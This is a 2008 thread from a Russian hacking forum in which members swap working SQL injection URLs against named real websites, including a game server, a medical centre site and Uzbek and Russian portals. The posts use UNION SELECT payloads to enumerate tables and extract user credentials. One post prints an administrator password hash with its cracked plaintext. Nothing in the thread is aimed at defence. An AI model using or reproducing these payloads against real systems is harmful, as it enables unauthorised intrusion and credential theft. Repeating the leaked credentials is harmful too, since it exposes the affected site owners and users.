HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.06.2008, 02:13
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

а в нём http://wow.alania.net/ такое проканает?
 
Ответить с цитированием

  #2  
Старый 16.06.2008, 02:21
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Проканает
http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #3  
Старый 16.06.2008, 02:24
JoN.SmiT
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами: 9479722

Репутация: -1
По умолчанию

значит сейчас нада писать вот так
http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
 
Ответить с цитированием

  #4  
Старый 16.06.2008, 02:27
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами: 10172486

Репутация: 874
По умолчанию

Сейчас нужно идти вот сюда
http://forum.antichat.ru/showthread.php?t=19605
и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь
Удачи!
 
Ответить с цитированием

  #5  
Старый 16.06.2008, 02:30
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #6  
Старый 16.06.2008, 03:13
Ch3ck
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами: 10485026

Репутация: 1879


По умолчанию

_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+0,1/*

Константинэ... только не ругай меня...
P.S Не могу уснуть...

Последний раз редактировалось Ch3ck; 16.06.2008 в 03:15..
 
Ответить с цитированием

  #7  
Старый 16.06.2008, 06:50
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами: 10081287

Репутация: 568
По умолчанию

JoN.SmiT не падай в минуса..) читай ману.

еще чтот разкрутил..
Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.be_users/*
administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm

Цитата:
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.fe_users/*
administrator;password

Есть скуля в поле login, как получить аутпут?)
Цитата:
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default

Последний раз редактировалось sabe; 16.06.2008 в 07:08..
 
Ответить с цитированием

  #8  
Старый 16.06.2008, 07:25
Ershik
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами: 9741777

Репутация: 100
По умолчанию

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
- здесь 1 колонка

http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
Цитата:
Query failed: The used SELECT statements have a different number of columns
- в чем проблема? В неправильных количествах колонок? Их всего одна

Хм..странно.
Вот тут все нормально сработало:
http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*

Последний раз редактировалось Ershik; 16.06.2008 в 07:27..
 
Ответить с цитированием

  #9  
Старый 16.06.2008, 07:30
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами: 9454841

Репутация: 504


По умолчанию

в общем есть скуль:
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/*
но при попытке просмотра таблицы
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю...
 
Ответить с цитированием

  #10  
Старый 16.06.2008, 08:46
z3r0cool
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами: 9501269

Репутация: 56
По умолчанию

Цитата:
Сообщение от gisTy  
...
Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.

Записей в ней нет.



http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA .TABLES/*

Хотя можно посмотреть и так.

http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn. user/*

Если бы небыло прав, то показало бы ошибку.

Последний раз редактировалось z3r0cool; 16.06.2008 в 08:49..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...